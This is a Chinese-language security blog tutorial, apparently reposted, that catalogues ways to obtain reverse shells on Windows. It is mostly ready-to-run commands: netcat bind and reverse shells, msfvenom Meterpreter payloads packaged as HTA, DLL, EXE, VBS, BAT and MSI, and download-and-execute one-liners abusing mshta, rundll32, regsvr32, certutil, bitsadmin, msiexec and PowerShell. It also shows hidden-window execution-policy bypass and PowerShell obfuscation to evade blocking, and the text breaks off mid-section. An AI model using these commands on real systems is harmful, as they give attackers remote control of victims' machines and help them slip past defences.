Window反弹shell大法

admin 2021年8月27日14:32:41评论534 views字数 6086阅读20分17秒阅读模式

Windows反弹Shell方式

/01 反弹shell简介

一,什么正向shell

正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。

这时候往往被连接方处于内网之中,不太可能。

二,什么是反向shell

反向shell(反弹shell):被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口 被占用等问题导致被控端不能正常接收发送过来的数据包。

/02 Windows反弹Shell

一,NC正向Shell

1.被控制端:

#注意这里-e是cmd.exe,意味着

1
nc -lvvp 6666 -e cmd.exe

image-20201122172144208

2.控制端:

1
nc 192.168.96.129 6666

image-20201122172204783

3.原理:

被控端将cmd.exe重定向到本地的6666端口,控制端主动连接被控端的6666端口,即可获得shell

二,NC反向shell

1.控制端:

1
nc -lvvp 7777

image-20201122173812021

2.被控制端:

1
nc -e cmd.exe 192.168.96.129 7777

3.原理:

被控端将cmd.exe重定向到控制端的6666端口,控制端只需要监听本地的6666端口,即可获得shell。

三,Mshta.exe

Mshta.exe是用于负责解释运行HTA(HTML应用程序)文件的Windows OS实用程序。 可以运行JavaScript或 VBScript的HTML文件。

1.通过Metasploit的HTA Web Server模块发起HTA攻击

1
2
3
4
5
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.78.117
msf exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/misc/hta_server) > set target 1
msf exploit(windows/misc/hta_server) > exploit –j

image-20201123135052270

1
mshta http://192.168.78.117:8080/9A5Iiz.hta

image-20201123135104679

拿到meterpreter

image-20201123135138316

2.通过Msfvenom生成恶意HTA文件发起攻击

控制端

1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.96.128 lport=4444 -f hta-psh -o 1.hta

image-20201123141017535

1
msf5 > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.96.128 -P 4444

image-20201123141043633

1
python –m SimpleHTTPServer 8000

image-20201123141059164

被控制端

1
mshta.exe http://192.168.78.117:8000/1.hta

image-20201123141114470

四,Rundll32.exe

Rundll32.exe与Windows操作系统相关,它允许调用从DLL导出的函数(16位或32位),并将其存储在适当的内存 库中。

1.通过Metasploit的SMB Delivery模块发起Rundll32攻击

1
2
3
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.96.128
msf exploit(windows/smb/smb_delivery) > exploit –j

image-20201123145541661

image-20201123145616994

1
rundll32.exe \192.168.96.128dzLNtest.dll,0

image-20201123145630776

拿到shell

image-20201123145707056

2.通过Msfvenom生成反弹shell的dll发起Rundll32攻击

1
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=53 -f dll > mingy.dll

image-20201123150309453

开启监听:

1
msf6 exploit(windows/smb/smb_delivery) >  handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.96.128 -P 53

image-20201123151440943

本地加载:

使用文件传输传递给被控制方

1
rundll32 shell32.dll,Control_RunDLL C:UsersadminDownloadsabaaba.dll

image-20201123151326276

拿到shell:

image-20201123151407339

3.利用Rundll32加载hta反弹shell

生成hta

1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.96.128 lport=7777 -f hta-psh > 44.hta

image-20201123152401865

使用文件传输上传hta,文件落地

1
bitsadmin /transfer shell http://192.168.96.128:8000/44.hta C:UsersadminDownloads44.hta

被控制端加载:

1
rundll32.exe url.dll,OpenURL 44.hta

image-20201123153028456

拿到shell:

image-20201123153123992

五,Regsvr32.exe

Regsvr32.exe是一个命令行应用程序,用于注册和注销OLE控件,如Windows注册表中的dll和ActiveX控件。 Regsvr32.exe安装在Windows XP和Windows后续版本的 %systemroot%System32 文件夹中。

1
语法:Regsvr32 [/s] [/u] [/n][/i[:cmdline]] <dllname>

/u - 注销服务器

/i - 调用DllInstall传递一个可选的[cmdline];当它与/u一起使用时,它调用dll来卸载

/n - 不要调用DllRegisterServer; 此选项必须与/i一起使用

/s - 沉默; 不显示消息框

1.通过Metasploit的Web Delivery模块启动Regsvr32

1
2
3
4
5
6
use exploit/multi/script/web_delivery
msf exploit (web_delivery)> set srvhost 192.168.96.128
msf exploit (web_delivery)> set target 3
msf exploit (web_delivery)> set payload windows/x64/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.96.128
msf exploit (web_delivery)> exploit –j

image-20201123153558732

image-20201123153633967

1
regsvr32 /s /n /u /i:http://192.168.96.128:8080/NE67gb2mbfQt.sct scrobj.dll

image-20201123153815598

拿到shell

image-20201123153848810

六,Certuil.exe

Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目标计算机中执行恶意的exe文 件以获得meterpreter会话。

1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.96.128 lport=6666 -f exe > 44.exe 

image-20201123154406371

1
python -m SimpleHTTPServer 8000

image-20201123154435863

开启监听:

image-20201123154854450

1
certutil.exe -urlcache -split -f http://192.168.96.128:8000/44.exe C:UsersadminDownloads44.exe & start C:UsersadminDownloads44.exe

image-20201123154911015

拿到shell:

image-20201123154938960

删除缓存

1
certutil.exe -urlcache -split -f http://192.168.96.128:8000/44.exe delete

image-20201123155059842

七,Powershell.exe

1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.96.128 lport=8899 -f psh-reflection -o shell8899.ps1

image-20201123155347491

1
python3 -m http.server 8000

image-20201123155455994

1
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.96.128:8000/shell8899.ps1’);shell8899.ps1";

拿到了shell

image-20201123155625831

1.通过PowerShell发动Powercat攻击

Powercat是PowerShell本地后门侦听器和反向shell工具,也称为修改版本的netcat,因为它集成支持经过编码的有效载荷。

克隆ps1:

1
git clone https://github.com/besimorhino/powercat.git

image-20201123160644127

1
python -m SimpleHTTPServer 8000

image-20201123160451114

开启监听:

image-20201123160612429

1
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.96.128:8000/powercat.ps1');powercat -c 192.168.96.128 -p 12345 -e cmd"

image-20201123160823491

拿到shell

image-20201123162315221

2.通过Web delivery反弹shell

1
2
3
4
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
msf exploit(web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(web_delivery) > exploit -j

image-20201123162636675

image-20201123162700615

image-20201123162724082

3.通过PowerShell启动cscript.exe

PowerShell允许客户端通过执行cscript.exe来运行wsf、js和vbscript脚本。

1
2
3
4
5
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=7777 -f vbs -o 3.vbs

python -m SimpleHTTPServer 8000

msf5 > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.96.128 -P 7777

image-20201123163233015

image-20201123163309755

image-20201123163350971

1
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.96.128:8000/3.vbs',"$env:temptest.vbs");Start-Process %windir%system32cscript.exe "$env:temptest.vbs""

image-20201123163813209

image-20201123163831096

5.通过PowerShell启动BAT文件攻击

PowerShell允许客户端执行bat文件

1
2
3
4
5
6
msfvenom -p cmd/windows/powershell_reverse_tcp lhost=192.168.96.128 lport=8888 -o 1.bat 

msf > handler -p cmd/windows/powershell_reverse_tcp -H 192.168.1.227 -P 4455


python -m SimpleHTTPServer 8000

image-20201123164441129

image-20201123164603038

image-20201123164542719

1
powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.96.128:8000/1.bat'))"

image-20201123164713872

八,Msiexec.exe

通过Metasploit启动msiexec攻击

Windows OS安装有一个Windows安装引擎,MSI包使用msiexe.exe来解释安装。

1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.96.128 lport=8888 -f msi > 1.msi 

image-20201123191423652

1
python -m SimpleHTTPServer

image-20201123191506481

1
msf > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.96.128 -P 8888
1
msiexec /q /i http://192.168.96.128:8000/1.msi

image-20201123191618614

拿到shell

image-20201123191643328

九,Metasploit

通过Metasploit生成恶意exe文件发起攻击

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=4445 -f exe -o 1.exe

image-20201123192128260

1
python -m SimpleHTTPServer 8000

image-20201123192138173

1
msf5 > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.96.128 -P 4445

image-20201123192436545

1
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.96.128:8000/1.exe','1.exe');start 1.exe

image-20201123192418071

拿到shell

image-20201123192555111

加了参数隐藏窗口的exp:

1
powershell -ep bypass -nop -w hidden (new-object system.net.webclient).downloadfile('http://192.168.96.128:8000/1.exe','1.exe');start-process 1.exe

image-20201123192734923

image-20201123192823784

十,Powershell代码混淆

启动Invoke-Obfuscation:

1
2
3
Powershell –ep bypass
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

设置混淆脚本代码位置:

1
set scriptpath C:UsersmingyDesktopmxInvoke-Obfuscationpp.ps1

选择混淆方式为 TOKENALL1:

保存混淆之后的脚本: out ppp.ps1

执行未混淆前脚本,被阻止:

FROM :https://ailumao.cn/ | Author:Ailumao

相关推荐: 隐藏 C2的几种方式

本文已加密 隐藏加速你的 C2 e119eb1da295c95738b0b95b5e5abff8d58a645e5116fafddafced491e4a2ac56ccb54ffa4f53d2dba55e821199cbf2287a8d2e8373891e601…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月27日14:32:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Window反弹shell大法http://cn-sec.com/archives/475106.html

发表评论

匿名网友 填写信息